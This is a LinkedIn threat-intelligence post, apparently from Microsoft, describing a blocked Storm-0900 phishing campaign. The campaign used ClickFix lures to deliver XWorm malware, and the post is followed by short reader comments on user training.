Post about Phishing Campaign pushing XWorm

www.linkedin.com · Microsoft Threat Intelligence · 4 months ago · news
quality 5/10 · average
0 net
Tags
phishing-campaign xworm
On Thanksgiving eve, November 26, Microsoft detected and blocked a high-volume phishing campaign from a threat actor we track as Storm-0900. The campaign used parking ticket and medical test result… | Microsoft Threat Intelligence | 10 comments LinkedIn respects your privacy LinkedIn and 3rd parties use essential and non-essential cookies to provide, secure, analyze and improve our Services, and to show you relevant ads (including professional and job ads ) on and off LinkedIn. Learn more in our Cookie Policy . Select Accept to consent or Reject to decline non-essential cookies for this use. You can update your choices at any time in your settings . Accept Reject Agree & Join LinkedIn By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . Skip to main content Microsoft Threat Intelligence’s Post Microsoft Threat Intelligence 112,857 followers 4mo Report this post On Thanksgiving eve, November 26, Microsoft detected and blocked a high-volume phishing campaign from a threat actor we track as Storm-0900. The campaign used parking ticket and medical test result themes and referenced Thanksgiving to lend credibility and lower recipients’ suspicion. The campaign consisted of tens of thousands of emails and targeted primarily users in the United States. Microsoft disrupted this campaign through a combination of email filtering, endpoint protections, and threat intelligence-based preemptive blocking of attacker infrastructure. The URLs in the phishing emails redirected to an attacker-controlled landing page on the malicious domain permit-service[.]top that employed several rounds of user interaction. First, users needed to solve a slider CAPTCHA by clicking and dragging a slider, followed by ClickFix, a technique that threat actors use to trick users into running malicious commands on their devices. If users fell for the ClickFix lure and executed a command in their Run prompt, a PowerShell script would run. Like similar Storm-0900 activity, this campaign led to XWorm, a popular modular malware used by many threat actors for remote access, deployment of other malware, and data theft. XWorm uses plugins that threat actors can use to perform various tasks on compromised devices. These plugins have evolved over the years. While we have not observed it being used in attacks, the latest XWorm version includes a plugin for encrypting files, giving the malware ransomware capability. Storm-0900 is a prolific threat actor that, when active, launches phishing campaigns every week. The actor abuses many popular brands in their emails. This specific campaign, along with the parking ticket and medical test result themed emails, also utilized emails purporting to be from a health care company and a government health agency. Microsoft recommends continuously raising awareness of phishing campaigns, including attack simulation training, among users. In addition to blocking the phishing emails through email filtering and preemptive blocking of infrastructure, Microsoft Defender detects the XWorm malware, malicious connections, and follow-on malicious behavior. This campaign underscores the importance of early detection and blocking of malicious activity in disrupting multi-stage attacks and stopping threat actors from performing follow-on actions. 271 10 Comments Like Comment Share Copy LinkedIn Facebook X Adam Goss 4mo Report this comment The shift to "ClickFix" techniques highlights a critical evolution in social engineering: attackers are no longer just asking for credentials; they are tricking users into bypassing their own security controls. The danger here is that many users believe "if I didn't type my password, I'm safe." They don't realize that pasting a script into the Run prompt is far more destructive than a compromised credential. To combat this, security teams must update their Phishing Simulations to test for these "instructional" attacks, not just the standard "fake login page" scenarios. You need to train your people to recognize when they are being weaponized against their own machine. Like Reply 3 Reactions 4 Reactions Bryan Hodges 4mo Report this comment Further evidence phishing is not just email anymore. In the wild you see it can be a multi-stage social engineering backed by modular malware. Continuous user training is still one of the strongest controls we have, but needs to be pushed beyond just phishing email simulations. Like Reply 2 Reactions 3 Reactions Breach Guardians 4mo Report this comment This rapid detection and disruption of a massive Storm-0900 phishing wave is a powerful reminder of why layered defenses and ongoing user awareness are critical. Like Reply 1 Reaction Roysten Ng 4mo Report this comment well written writeup 👍 Like Reply 1 Reaction Gregory H. 4mo Report this comment Any jobs available? Like Reply 1 Reaction Luck Suknimit 4mo Report this comment Thank for sharing Like Reply 1 Reaction Patrick M. 4mo Report this comment Thank you for sharing, peace! Like Reply 1 Reaction Shanea Collins 4mo Report this comment Thanks for sharing. Like Reply 1 Reaction See more comments To view or add a comment, sign in 112,857 followers View Profile Connect Explore content categories Career Productivity Finance Soft Skills & Emotional Intelligence Project Management Education Technology Leadership Ecommerce User Experience Recruitment & HR Customer Experience Real Estate Marketing Sales Retail & Merchandising Science Supply Chain Management Future Of Work Consulting Writing Economics Artificial Intelligence Employee Experience Workplace Trends Fundraising Networking Corporate Social Responsibility Negotiation Communication Engineering Hospitality & Tourism Business Strategy Change Management Organizational Culture Design Innovation Event Planning Training & Development Show more Show less
← Back to stories